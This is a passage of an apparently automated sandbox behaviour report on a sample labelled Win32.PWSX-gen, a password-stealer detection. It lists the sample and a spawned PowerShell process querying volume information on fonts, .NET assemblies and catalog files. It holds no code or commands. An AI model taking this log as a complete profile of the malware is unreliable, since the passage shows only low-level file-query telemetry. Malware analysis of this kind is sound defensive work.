          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
